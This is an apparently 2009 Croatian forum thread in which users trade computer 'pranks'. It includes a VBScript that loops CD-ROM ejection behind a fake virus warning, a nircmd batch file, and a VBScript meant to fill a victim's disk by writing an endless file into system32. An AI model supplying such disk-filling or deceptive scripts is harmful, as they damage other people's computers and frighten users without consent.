Vaši prankovi (šale) i hackovi

poruka: 1.070
|
čitano: 249.276
|
moderatori: DrNasty, pirat, Lazarus Long, XXX-Man, vincimus
+/- sve poruke
ravni prikaz
starije poruke gore
15 godina
offline
RE: Vaši prankovi(šale) i hackovi

Haha, isfurano je ovo, to cu uvalit frendu poslat cu mu prek msn-a i rec mu da je to lektira. xD

15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

lol volim ovu temu

15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
B-52 kaže...
mtopol kaže...

gluposti

 sta su ovo neke 3d slike..ne kuzim kak to funkcionira al dobro izgleda ;)
 To su ti optičke varke ;)
Stavio sam bratu onu skriptu! 1. sam stavio da kad on oce pokrenuti GTA4, da mu se otvori ta skripta s textom : You are to stupid to play this game! If you play it too long your brother will kill you. Do you want to continue?
Ovaj je pokrenuo i ostao zapanjen. Još uvijek sjedi za kompom sirom otvorenih usta :) Hvala na ovome, vrijedilo je!  Cool
Poruka je uređivana zadnji put sub 11.4.2009 19:30 (Unknown1909).
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

drago mi je čuti ovo

koji si ti car , dobra namještaljka

Chuck Norris ne jede med on žvače pčele !! 92% tinejđera sluša turbo folk. Ako si ti među onih 8% koji još uvijek slušaju pravu glazbu kopiraj si ovo u potpis. Da se Facebook server sruši 90% mladih palo bi u tesku depresiju. Ako si u onih 10% koji bi im se smijali stavi ovo u potpis
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
Unknown1909 kaže...
B-52 kaže...
mtopol kaže...

gluposti

 sta su ovo neke 3d slike..ne kuzim kak to funkcionira al dobro izgleda ;)
 To su ti optičke varke ;)
Stavio sam bratu onu skriptu! 1. sam stavio da kad on oce pokrenuti GTA4, da mu se otvori ta skripta s textom : You are to stupid to play this game! If you play it too long your brother will kill you. Do you want to continue?
Ovaj je pokrenuo i ostao zapanjen. Još uvijek sjedi za kompom sirom otvorenih usta :) Hvala na ovome, vrijedilo je!  Cool
 muahahahahahaha ...ajde da vidim još psina za komp...
Bolje biti 100 godina bogataš nego 7 dana siromah º°¨ ¸„ø¤º°¨„ø¤º°¨°º¤ø„¸¨°º¤ø„¸¸„ º¤ø„¸ ¨°º¤ø„ ¸APOCALYPTICA º¤ø„¸ ¸„ø¤º°¨¸„ø¤º „¸¨°º¤ø„¸¸„ ¸„ø¤º „¸¨°
15 godina
offline
Vaši prankovi(šale) i hackovi

A zna li itko kako napraviti da ako pokrenes onaj file AAAA da svejedno ako se pritisne ili yes ili no da se pocne otvarati DVD-rom tj napraviti petlju...

EP45-DS4 Core 2 Quad Q6600 GeForce GTX 260 Corsair TWIN 2x2 GB 500.GB Seagate Disk
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
4ucker kaže...

A zna li itko kako napraviti da ako pokrenes onaj file AAAA da svejedno ako se pritisne ili yes ili no da se pocne otvarati DVD-rom tj napraviti petlju...

WindowsXP=msgbox("Your computer is infected by some fu**ing dangerous virus and it's going to destroy your DVD-ROM. Click YES to continue, or NO to watch the boring dialogue box",20,"Warrning")


Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop

End If

 

____________________

 

ovo radi

Uzalud je čitati, ako ništa ne naučiš ništa iz tog što si pročitao... http://www.kozul.comuv.com/forum/
Poruka je uređivana zadnji put ned 12.4.2009 22:05 (Bellatrix).
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

Evo još jedan prank. Prestrašite nekoga s BSOD-om. Ovo je nešto kao screensaver. Napravite prečac i promjenite mu ikonu i kad žrtva klikne na prečac show goes on!Smijeh

Za izlazak treba samo pritisnuti esc

http://technet.microsoft.com/en-us/sysinternals/bb897558.aspx skinite odavde taj prank

Uzalud je čitati, ako ništa ne naučiš ništa iz tog što si pročitao... http://www.kozul.comuv.com/forum/
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
Bellatrix kaže...

Evo još jedan prank. Prestrašite nekoga s BSOD-om. Ovo je nešto kao screensaver. Napravite prečac i promjenite mu ikonu i kad žrtva klikne na prečac show goes on!Smijeh

Za izlazak treba samo pritisnuti esc

http://technet.microsoft.com/en-us/sysinternals/bb897558.aspx skinite odavde taj prank

 Meni avira 09 javlja da je to vvirus.........evo drugu sam smjestio foru sa otvaranjem dvd.....hehehCool...........tema je dobra
Poruka je uređivana zadnji put sri 15.4.2009 0:41 (dogman).
15 godina
offline
RE: Vaši prankovi(šale) i hackovi
Bellatrix kaže...

Evo još jedan prank. Prestrašite nekoga s BSOD-om. Ovo je nešto kao screensaver. Napravite prečac i promjenite mu ikonu i kad žrtva klikne na prečac show goes on!Smijeh

Za izlazak treba samo pritisnuti esc

http://technet.microsoft.com/en-us/sysinternals/bb897558.aspx skinite odavde taj prank

 sjajno SmijehCool
vjerodostojnost je na razini Smijeh
16 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

tako treba

i ja malo frendove kurim

napravio sam onaj virus koji otvara sam sebe i na kraju se komp sruši

15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
dogman kaže...
Bellatrix kaže...

Evo još jedan prank. Prestrašite nekoga s BSOD-om. Ovo je nešto kao screensaver. Napravite prečac i promjenite mu ikonu i kad žrtva klikne na prečac show goes on!Smijeh

Za izlazak treba samo pritisnuti esc

http://technet.microsoft.com/en-us/sysinternals/bb897558.aspx skinite odavde taj prank

 Meni avira 09 javlja da je to vvirus.........evo drugu sam smjestio foru sa otvaranjem dvd.....hehehCool...........tema je dobra
Meni NOD32 ništa ne javlja.
A luda je šala, čovjek bi stvarno pomislio, evo ga nešto nevalja! hahaCool
Uzalud je čitati, ako ništa ne naučiš ništa iz tog što si pročitao... http://www.kozul.comuv.com/forum/
15 godina
offline
RE: Vaši prankovi(šale) i hackovi
Bellatrix kaže...
dogman kaže...
Bellatrix kaže...

Evo još jedan prank. Prestrašite nekoga s BSOD-om. Ovo je nešto kao screensaver. Napravite prečac i promjenite mu ikonu i kad žrtva klikne na prečac show goes on!Smijeh

Za izlazak treba samo pritisnuti esc

http://technet.microsoft.com/en-us/sysinternals/bb897558.aspx skinite odavde taj prank

 Meni avira 09 javlja da je to vvirus.........evo drugu sam smjestio foru sa otvaranjem dvd.....hehehCool...........tema je dobra
Meni NOD32 ništa ne javlja.
A luda je šala, čovjek bi stvarno pomislio, evo ga nešto nevalja! hahaCool
 Yep, ni meni NOD32 nish ne javlja da je viruzzz, jer NOD32 RUllzzzzz, a Avira Suckz...
EP45-DS4 Core 2 Quad Q6600 GeForce GTX 260 Corsair TWIN 2x2 GB 500.GB Seagate Disk
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

OVO RADITE NA VLASTITU ODGOVORNOST.

NE ODGOVARAM ZA NIKAKVE POSLJEDICE KORIŠTENJA OVOG KOMADA KODA.

 

Set MyFSO = CreateObject("Scripting.FileSystemObject")
Set MyTextStream = MyFSO.CreateTextFile("c:\windows\system32\numbers.txt")
For i = 1 To 999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999
MyTextStream.WriteLine(i)
Next
MyTextStream.Close

 

Spremite kao .vbs

 

PONAVLJAM, AKO VAM SE IŠTA DOGODI KORIŠTENJEM OVOGA, NEMOJTE MI DOĆI PLAČUĆI!

NISAM ODGOVORAN ZA NIŠTA ŠTO BI SE MOGLO DOGODTI KORIŠTENJEM OVOGA.

"Carpe diem..." www.tutorialized.com Master of Disaster
16 godina
offline
Vaši prankovi(šale) i hackovi

bar reci onda kaj to radi.. .)

People who are crazy enough to think they can change the world are the ones who do.
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

Testiraj pa vidi, hehe.

 

Stalno ti puni taj .txt file tekstom i tako ti puni HDD.

 

EDIT: Ako želite ovo ubacite nekom koga mrzite!!!

"Carpe diem..." www.tutorialized.com Master of Disaster
Poruka je uređivana zadnji put sri 15.4.2009 11:52 (Moljac).
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

Koja carska fora! Predobro!!!

Asrcok 775 Dual Vsta Pentium D Dual Core 3,4 Ghz @ 3,83 Ghz 2 Gb RAM ATI Radeon X1700 FSC
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

@4ucker-ako je to virus a ti kažeš da avira sucks a nod32 rules onda se malo zapitaj-zar ne bi trebao reći obrnuto(avira rules-nod32 sucks)

15 godina
protjeran
offline
RE: Vaši prankovi(šale) i hackovi
Unknown1909 kaže...
B-52 kaže...
mtopol kaže...

gluposti

 sta su ovo neke 3d slike..ne kuzim kak to funkcionira al dobro izgleda ;)
 To su ti optičke varke ;)
Stavio sam bratu onu skriptu! 1. sam stavio da kad on oce pokrenuti GTA4, da mu se otvori ta skripta s textom : You are to stupid to play this game! If you play it too long your brother will kill you. Do you want to continue?
Ovaj je pokrenuo i ostao zapanjen. Još uvijek sjedi za kompom sirom otvorenih usta :) Hvala na ovome, vrijedilo je!  Cool
 Kako to napravis da ti se pokaze prije neg sta udes u nesto plss reci da mogu zeznut sestru
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
kris_marko kaže...
itf4n kaže...
kris_marko kaže...

ja znam napraviti one fake viruse preko notepad-a i pokojeg trojana ali sve je to nekako jednostavno samo copy pase s neta,,,Neodlučan

htio bi puno vise Belji se

 
Točnije, neznaš niti to; kako i sam kažeš - to je copy/paste.
 zar nismu svi poceli sa copy-paste s neta Smijeh
a sta si tece cd-rom moze se i ovako
cd %windir%
nircmd.exe cdrom open d:
nircmd.exe cdrom close d:
i naravno save pod .bat Smijeh
 to ti an svim kompovima nece radit jel nije na svim kompovima cd-rom na d varijabli!
http://ubizec.net46.net/forum http://www.ubizeccorporation.bloger.hr Posjeite forum za gaming,programiranje i izrada igara and hacking!
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
Mayales kaže...
Inferno kaže...
krle kaže...

hahaha

 

jel se moze u procesima?

 jok .vbs
 Može se ali treba naći odgovarajući proces koji će u ovom slučaju započinjati sa wmp...
 wscript.exe
"Carpe diem..." www.tutorialized.com Master of Disaster
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi
Bustin at people who said my name in vain, I got no time for them tricks, I'm heavy in the game!!! I wanna be a baller, please, But the bitches and the liquor keep on callin me... I'm floatin free on the highway, formulatin plans...
15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
Smooth Operator kaže...
 WTF je ovo?
"Carpe diem..." www.tutorialized.com Master of Disaster
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

Otvori, unesi potrebne informacije i vidi. Nije nikakav virus ili spyware.

Bustin at people who said my name in vain, I got no time for them tricks, I'm heavy in the game!!! I wanna be a baller, please, But the bitches and the liquor keep on callin me... I'm floatin free on the highway, formulatin plans...
16 godina
offline
RE: Vaši prankovi(šale) i hackovi
Moljac kaže...
Smooth Operator kaže...
 WTF je ovo?
 ma da ti vijesti s tvojim imenom ili necijim tudjim napravi radi zezancije
People who are crazy enough to think they can change the world are the ones who do.
15 godina
offline
RE: Vaši prankovi(šale) i hackovi
Smooth Operator kaže...

Otvori, unesi potrebne informacije i vidi. Nije nikakav virus ili spyware.

 NIje virus,praviš svoje vjesti
Hakiranje je umjetnost a ne zločin.
15 godina
protjeran
offline
Vaši prankovi(šale) i hackovi

ljudi pogledajte ovo, necete vjerovati Luxx u novinama ali u jako dramaticnoj i pomalo smjesnoj clanku

klik   Smijeh

15 godina
neaktivan
offline
RE: Vaši prankovi(šale) i hackovi
deja_vu kaže...

ljudi pogledajte ovo, necete vjerovati Luxx u novinama ali u jako dramaticnoj i pomalo smjesnoj clanku

klik   Smijeh

ROFLMAO
Fake.
Poruka je uređivana zadnji put sri 15.4.2009 14:42 (netko_namo).
15 godina
protjeran
offline
RE: Vaši prankovi(šale) i hackovi

momci pitanje, ideja je pala vezana uz post sa gta4

 

može ovo:

 

ispiše tekst sa opcijama yes i no, primjerice ako klikne yes uđe u igru, ako no, pokrene onaj BSOD što ima za skinut

 

dobra gore fora s luxxom, ali mogao si i neku bolju vijest odabrat, ja sam za frenda stavio da je uhvaćen mrtav pijan u beogradu

Poruka je uređivana zadnji put sri 15.4.2009 14:29 (livadasb).
15 godina
neaktivan
offline
Vaši prankovi(šale) i hackovi

Evo ja Biznismen godine

http://www.vestisrbija.com/proglasen-za-biznismena-godine/?id=630635

hahahh. ovo je žestoko..

Uzalud je čitati, ako ništa ne naučiš ništa iz tog što si pročitao... http://www.kozul.comuv.com/forum/
Nova poruka
E-mail:
Lozinka:
 
vrh stranice